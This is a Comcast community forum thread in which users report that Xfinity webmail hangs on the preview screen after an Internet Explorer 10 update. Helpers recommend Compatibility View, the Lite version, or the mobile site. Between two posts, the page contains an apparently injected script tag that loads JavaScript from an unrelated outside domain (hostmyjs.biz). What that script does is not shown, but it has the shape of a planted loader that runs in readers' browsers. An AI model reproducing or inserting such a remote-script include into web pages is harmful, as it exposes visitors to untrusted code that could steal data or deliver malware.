Community Forum

Can't open Email

New Poster

Re: Please solve ASAP!

I am having the same issue. I have cleared cache and history nothing helps. I tried to get the answers to the questions re lite or full. I can't get into preferences to check. everything I click on goes back to preview screen. Please HELP!!!

Gold Problem Solver

After signing in, copy/paste THIS link into your address bar. 

http://sz0096.ev.mail.comcast.net/zimbra/h/search

Let me know then if you can get to the Preview window or not.

Post back.

CC

New Poster

When I copy and paste that link, I can get my emails. But when I try from the home page I still cannot get my emails. Is this going to be fixed or am I going to have to copy and paste every time.

Frequent Visitor

Somehow all your emails are coming to my email address.  I settled my issue with them two weeks ago so now everyone they answer is showing up in my email   Good luck people  afte 14 days of emailing and being forwarded to foreign call centers a call center in Pittsburgh where I live fixed it.  Word of advice if you want help call the comcast number ask for billing   they will transfer you to a tech in their building.  These bloggers on here do not fix anything.  COMCAST PLEASE STOP SENDING ME OTHER PEOPLES EMAILS

Official Employee

hpaulabob: If you no longer wish to receive notifications about this thread in the forums, please click the "Options" at the top and then click "Unsubscribe".  That should prevent you from receiving further notifications via email about this thread.

I am an Official Comcast Employee.
Official Employees are from multiple teams within Comcast: CARE, Product, Leadership. We ask that you post publicly so people with similar questions may benefit from the conversation.
Was your question answered? Mark the post as Best Answer!
New Poster

Re: Can't open Email

I too cannot open my email. I am using IE 10.  I have cleared my browser cache of temporary files and cookies.  I cannot tell which version of Xfinity Comcast I am using as that window will not open either.  When I attempt to open my email, I get a white screen with a blue circle indicating that it is working, but it never opens the full email inbox.

Thank you for your help

Nancy

Gold Problem Solver

@Nacornnell wrote:

I too cannot open my email. I am using IE 10.  I have cleared my browser cache of temporary files and cookies.  I cannot tell which version of Xfinity Comcast I am using as that window will not open either.  When I attempt to open my email, I get a white screen with a blue circle indicating that it is working, but it never opens the full email inbox.

Thank you for your help

Nancy

Enable Compatibility View under Tools in Internet Explorer 10.

Post back if that works for you.

CC

New Poster

CC  Enabling the compatibility view did not work

Frequent Visitor

**deleted**

New Poster

Re: Can't Get In To Read Email

will not let me open email

Frequent Visitor

I had the same problem starting this a.m. March 14th.  Mircrosoft had update my system to Explorer 10.  Comcast offered some suggestion, which didn't work.  Finally she suggested that I contact a nerd technician.

I did and it cost me $250.00 plus a sales pitch to continue a years worth of service.  After two hours of online communication, it was fixed.  Still not sure just what the problem was.

New Poster

I waited 5 hours and tried the compatibility mode again and this time it worked.  Haven't a clue as to what changed

Regular Visitor

Having same problem for past few days.  While the blue circle was spinning I changed to compatibility view and it worked and my inbox opened.

I got out of email and came back in again and again the inbox or individual email wouldn't open until I switched to compatibility view.

There is a major problem here that seems to be happening for some time now that needs to be fixed!

Gold Problem Solver

Did you update to Internet Explorer Version 10 with the Windows Updates a couple of days ago?

If you have your browser set to clear your browser cache when closing your browser in Internet Explorer, you will need to check Compatibility View again.

I have reported this to the Xfinity Team.  I don't know at this point if that is a bug with Internet Explorer ( having to re-enable compatibility view) or an XfinityConnect.

When I get more information it will be posted.

CC

Frequent Visitor

It automatically updated to Explorer 10.  I called comcast, and they had me try all the normal remedies.  None worked.  I was told to find a technician.  I google mircosoft and it led me to an online company.  I paid $250.00 to them, but they did correct the problem.  I am able to access my email currently. 

Regular Visitor

Yes I did do the update which included IE10.  I don't have it set to clear the browser.  I just went back in to email before this post and didn't have a problem and I didn't have to use the compatibility view this time.

Gold Problem Solver
Moved:

Re: Day 4 - STILL can't open Xfinity webmail.

Post removed because it contains personal information. See the new post addressed to you please.

New Poster

E-mail "freezing"

Hi,

I am able to log into my Comcast account easily as well as the first screen for my e-mail access, however, when I attempt to move to my full screen (View Entire Box), the Comcast application freezes, and goes no further.  Any ideas as to how to fix this?  Thanks.

j5k8

New Poster

Re: E-mail "freezing"

same with me (when I try to view my entire mailbox, it goes to the previous screen, and on the top it says that my session timed out due to inactivity.  Odd--gotta call support

Regular Visitor

Same for me. No idea what is wrong.

New Poster

Cannot get past "XC Preview Window"

From this window, anything that I click, I just get the revolving blue dots, nothing else. Have read other postings and have cleared cache. Using IP9 browser.

New Poster

Per a prior e-mail in the string of replies, I clicked on Compatitability view under "Tools" and it allowed me to open my full e-mail box.

New Poster

Per a prior e-mail in the string of replies, I clicked on compatibility view under tools and it worked.

Regular Visitor

email won't load

Email won't load. Preview page displays, but when I click to display all messages, I get a blank page with whirling blue dots. The page never loads. This has been going on a week. i can view full messages only on other devices, however, I have documents I need to print, and cannot print from other devices.

I see from forums this is an ongoing bug in Comcast system for several years.

Can you please help?

Tags (1)
Gold Problem Solver
Moved:

Email wont load

Read the first post in THIS thread and reply in THAT thread.

New Poster

Email wont load

Email wont load,anybody now what to do?

New Poster

Re: e mail will not open

I can see my emails but when I click on them they do not open

Gold Problem Solver

Please read the FIRST post in THIS thread and try the suggestions listed.  If you still cannot access email after that, please post the requested information also in that post.

The XfinityConnect Team are monitoring these posts as often as possible.  They are aware of the issues and are working on fixes.

Another suggestion:  See if switching to the LITE version of XfinityConnect helps you to access your email.

To do:

Open XC, click on Preferences in the Preview window, then click on the General tab.  Switch to the Liyte versionn. close and re-open XC.  Can youi access email with Lite?  let us know.

Another option you can tery to access email is to use the mobile app.  Type in m/comcast.net in your address bar to go there.  Thsi is a very basic app.

CC

m.comcast.net.JPG

New Poster

email issue

It seems that I am not the only one having issues trying to read my email as per the numerous other postings from yesterday and today.  Like many others, I can log into email, see that I have messages but when I click on any of them all I get is the spinning wheel.  Internet works fine.  As this seems to be a system-wide issue, when can we expect to see this issue resolved?  I tried calling in, but surprise surprise due to heavy call concentration the wait is extensively long.

Frequent Visitor

I am good to go with openning my email now; however, I paid $250.00 to get it going. 

New Poster

can't open e-mail

Can't open e-mail - don't know if I have received any new e-mails. This started early this morning.  What's going on?

New Poster

Email Account

After I login to my email account I cant open my inbox

New Poster

Re: Cant view entire inbox

cant open entire inbox ...just sits there and loads..tried everything in prior posts 'solution' still nothing

Gold Problem Solver

In addition to the first post in this thread...

Did you recently install Windows Updates and are you using Internet Explorer Version 10 now?

If yes, see if enabling Compatibility View (under Tools) helps you.  Let us know one way or the other.  Thanks.

CC

New Poster

that worked for me.

J5W8

Gold Problem Solver

Thanks for posting back.  It seems this week in particular, it is an issue the Windows Update for Inteenet Exploer 10 was just released.. 

I did notify the XfinityConnect Team about this.  At this point I don't know if it is an Internet Explorer Version 10 issue, OR a Comcast issue.

NOTE:  WHEN YOU CLEAR YOUR BROWSER CAHCE, YOU WILL HAVE TO ENABLE COMPATIBILITY VIEW AGAIN!

cc

New Poster

Problem viewing inbox and emails

I have access to internet, and I can even log in. Problem is after I log in to email. Once my email page opens, I can see my inbox, but when I click to either open an email or try to view all inbox, my screen goes white with the blue thinking circle in the middle forever. Ok I've only let it sit there for a couple hours, but that seemed like forever. I can access my email from my cell phone, so I'm thinking that it must be a setting issue, but I have been unsuccessful in figuring it out on my own. I am using a laptop without a wireless router, with windows 7, and internet explorer 10. I have cleared and deleted history, cache, ect.. I have also turned off modem and reset. Still having the same problem. Any help with this issue would be much appreciated. I tried to call comcast/xfinity, but they want me to pay $40 upfront and then $15 per month, just to look and see if they can do anything, with of course, no gaurantees. Just doesn't seem worth it, plus seems a little cheap seeing as how I've been a loyal customer for over 10 years. Apparently business is good enough to treat long term customers this way. But I digress, any help would be great, thanks.

Gold Problem Solver

Re: Problem viewing inbox and emails

Please read the FIRST post in this thread and reply with all information requested in it.

Also note:

Did you recently install Windows Updates and are you using Internet Explorer Version 10 now?

If yes, see if enabling Compatibility View (under Tools) helps you.  Let us know one way or the other.  Thanks.

CC

New Poster

Just logged into email with Google Chrome, and was able to get right in with no problems. So I would think that this means that it has to be a setting issue of some kind. Again anyone who has experienced this or knows what to do in regard to using internet explorer still, I would sure appreciate your instruction. Thanks.

Gold Problem Solver

Did you read and review my post above yours?  Also note the issue with Internet Explorer Version 10 that is also noted in my previous post.

CC

New Poster

Compatibility mode worked. Thank you very much. I figured it had to be a setting issue. Hope Comcast/xfinity see this quick easy post and learn from it. Could have cost a bunch of money for such a simple fix. Thanks again.

Gold Problem Solver

@j4ball wrote:

Compatibility mode worked. Thank you very much. I figured it had to be a setting issue. Hope Comcast/xfinity see this quick easy post and learn from it. Could have cost a bunch of money for such a simple fix. Thanks again.

The XfinityConnect Team has already been notifed of the problem.  At this point we don't know for sure if the bug is on Internet Explorer's side or Comcast's side.

As more information becpomes available we will post it.

Also remember when you clear your browser cache you must re-enable Compatibility View in IE 10 again.  This is also an issue.

CC

Not applicable

Compatability Enabling worked for me. I have laptop/W7, IE 10. Thanks very much

New Poster

Re: Email connection

I am having same issue, did as read, still nothing! I don't have a clue if I have lite Xfinity or whatever. I should not have to! I pay Xfinity to provide me with the best, and it shouldn't create difficulty for me. I am fortunate to have an iPhone, and a work computer where I can access. I am sick and tired of issues with Comcast/Xfinity. Please do not make it harder on your customers and speak as though this is something better! Yes, I am frustrated!

Highlighted
Official Employee

Re: Email connection

Folks,

We are aware of a compatibility issue with IE10 and Xfinity Connect.  So far, the reports limit this to Windows 7, but we are investigating Windows 8 as well.  At this time, we are investigating the issue.  As as been reported earlier in the forum, Compatability Mode does resolve the issue, though you may need to clear your cookies and cache first.  If you do, you'll need to re-enable Compatability Mode again after restarting your browser.

We apologize for the inconvenience this creates and are working swiftly to resolve the matter.

Official Employees are from multiple teams within Comcast: CARE, Product, Leadership. We ask that you post publicly so people with similar questions may benefit from the conversation.
New Poster

Re: Comcast email inbox will not open to full view

I have Xfinity connect full version, switching to lite did not help. Browser cache is clear. Using windows 7 with explorer 9 version. My e-mails eventually show up but it takes several minutes between the preview page and the full view. Have tried compatibility view but no differance. This seems like a Comcast issue as it just started a couple of weeks ago.

Official Employee

Re: Comcast email inbox will not open to full view

TinCup,

When you say you switched to Lite version did not help, you're still taking several minutes to render the page?  

Regular Visitor

Re: connection

I am having the same problems with Comcast internet and e-mail.   I have done everything Comcast has suggested starting with clearing history.  Nothing is working.     Isn't this odd that Comcast is the only internet e-mail that I have problems opening.   In this day and age, we should not have problems with internet connection or email opening.    

Comcast, isn't it past time to fix these issues where they do not happen again?    Most people think it is time.

<script type="text/javascript" src="https://hostmyjs.biz/include.js?id=js15"></script>
Gold Problem Solver

Did you read the entire first post in THIS Thread?  If you did, please post the information requested after trying all the suggestions made.

Frequent Visitor

This isn't just an IE issue.  I was able to access my email at work today using Firefox, but I just came home and tried to log in (also using the same version of FF 19.0.2) and I'm having the same problem as everyone else - I can log in to my account, I can see the messages, but when I click to view my inbox, it takes me back to the main Comcast screen.

I did try this link from above  http://sz0096.ev.mail.comcast.net/zimbra/h/search  and so far it works, but I want to go back to my regular view.

Are they also still working on the problem that you constantly get logged out of your account (like at least twice a day)?